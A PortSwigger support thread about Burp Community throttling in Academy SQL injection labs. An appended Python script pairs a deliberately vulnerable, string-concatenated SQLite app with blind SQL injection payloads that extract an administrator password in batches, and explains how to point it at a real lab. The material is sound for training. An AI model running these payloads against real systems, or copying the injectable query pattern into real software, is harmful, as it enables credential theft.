Do I need a Burp Professional license to take the PortSwigger Academy course?

Samuel | Last updated: Jun 21, 2022 05:07AM UTC

Hi, I have a doubt. Does Burp Suite get better performance when solving PortSwigger Academy labs? I've been taking the PortSwigger Academy (using the Burp Suite Community license), but some of the labs take too long to complete. For instance, in the SQL injection part, I've been trying Cluster Bomb attacks and the brute-force tests take too long. I'm not sure whether, in order to get the most from the PortSwigger Academy course, I should already have a Burp Suite Professional license. Thanks again.

Ben, PortSwigger Agent | Last updated: Jun 21, 2022 07:27AM UTC

Hi Samuel, All but a small handful of labs are solvable using the free Burp Community edition (there are a small number of labs that require the use of the Burp Collaborator, which is only available within Burp Professional). For some of the labs that require the use of Intruder you may have to split your attack up into smaller subsets in order to get round the request throttling that occurs within Intruder in Burp Community. What are the specific names of the lab(s) you are having issues with?

Samuel | Last updated: Jun 22, 2022 05:13PM UTC

Hi Ben, thanks for your response. Specifically, the SQL injection labs (Blind SQL, Enumerating Database). I was replicating some of the methodologies explained by Rana Khalil using Cluster Bomb, but it takes years for me to finish the brute-force tests.

Ben, PortSwigger Agent | Last updated: Jun 23, 2022 10:45AM UTC

Hi Samuel, You probably have two options. Breaking up your attacks into smaller subsets is really going to be the only way to improve things for you if you want to use native Intruder. Alternatively, you could look to use the Turbo Intruder extension, which does not contain any request throttling. If we take 'Blind SQL injection with conditional responses' as an example (it sounds like this might be the type of lab you are having issues with), rather than running an attack that cycles through a-z and 0-9 for each of the 20 characters in the password, you could split the attack up so that you perform an attack on the first 3 characters of the password, then a second attack that does the same for characters 4, 5 and 6, etc. This approach is not quite as automated as using an unthrottled Intruder in Burp Professional, but it should still be manageable if you want to stick with Intruder.
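
The batching approach Ben describes, as an added example that is not part of the thread and not PortSwigger's code: a Python script that extracts a 20-character password from a conditional-response blind SQL injection one batch of 3 positions at a time, each batch being the cluster-bomb product of positions x charset, so it can be run as several small Intruder-sized attacks instead of one 720-request attack. The vulnerable endpoint is a constructed in-memory SQLite stand-in; the TrackingId cookie injection point, the `administrator` username, the `users` table and the "Welcome back!" marker are assumptions for the sake of the example, not details taken from the thread.

```python
import sqlite3
import string
from itertools import product
from typing import Callable, Dict, Iterable, Tuple

CHARSET = string.ascii_lowercase + string.digits  # a-z and 0-9, as in the thread
PASSWORD_LENGTH = 20                              # 20-character password, as in the thread
BATCH_SIZE = 3                                    # positions per attack (1-3, 4-6, ...)

# ---- Constructed stand-in for the lab's vulnerable application ---------------
# Assumptions, not stated in the thread: the injectable value is a tracking
# cookie concatenated into a query, the target is the administrator's password,
# and a true condition makes the page contain "Welcome back!".
ADMIN_PASSWORD = "k3u9p1zx7b2mq8w4rt6n"  # constructed secret, 20 chars


def _build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('administrator', ?)", (ADMIN_PASSWORD,))
    db.execute("CREATE TABLE tracking (id TEXT)")
    db.execute("INSERT INTO tracking VALUES ('abc123')")
    return db


_DB = _build_db()


def vulnerable_app(tracking_id: str) -> str:
    """Deliberately vulnerable: the cookie value is concatenated into SQL."""
    sql = "SELECT id FROM tracking WHERE id = '" + tracking_id + "'"
    try:
        row = _DB.execute(sql).fetchone()
    except sqlite3.Error:
        return "Welcome"
    return "Welcome back!" if row else "Welcome"


# ---- Attacker side: one "attack" per batch of positions ------------------------
def payload(position: int, ch: str) -> str:
    """Boolean condition on one character of the administrator's password."""
    return ("abc123' AND SUBSTR((SELECT password FROM users WHERE "
            f"username='administrator'),{position},1)='{ch}")


def attack_batch(send: Callable[[str], str], positions: Iterable[int]) -> Dict[int, str]:
    """Cluster-bomb equivalent: try every (position, char) pair in the batch."""
    found: Dict[int, str] = {}
    for pos, ch in product(positions, CHARSET):
        if "Welcome back!" in send(payload(pos, ch)):
            found[pos] = ch
    return found


def extract_password(send: Callable[[str], str], length: int = PASSWORD_LENGTH,
                     batch_size: int = BATCH_SIZE) -> Tuple[str, int]:
    """Run ceil(length / batch_size) small attacks instead of one large one.

    Returns the recovered password and the number of attacks run.
    """
    chars: Dict[int, str] = {}
    batches = 0
    for start in range(1, length + 1, batch_size):
        batches += 1
        positions = range(start, min(start + batch_size, length + 1))
        chars.update(attack_batch(send, positions))
    missing = [i for i in range(1, length + 1) if i not in chars]
    if missing:
        # Nothing matched: the charset is too small or the length is wrong.
        raise ValueError(f"no character matched at positions {missing}; widen CHARSET")
    return "".join(chars[i] for i in range(1, length + 1)), batches


def requests_per_batch(batch_size: int = BATCH_SIZE) -> int:
    """Size of one attack: positions in the batch times charset length."""
    return batch_size * len(CHARSET)


if __name__ == "__main__":
    pw, n = extract_password(vulnerable_app)
    print(f"recovered {pw!r} in {n} attacks of {requests_per_batch()} requests each")
```

Against a real lab, replace `vulnerable_app` with a function that sends the value in the relevant cookie and returns the response body; each call to `attack_batch` then corresponds to one 108-request Intruder attack, which is what keeps an individual run small enough to tolerate Community-edition throttling (the total request count, 720 for 20 positions, does not change). Note that `=` is case-insensitive in some databases, so if a position never matches, widening the charset is the first thing to check.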

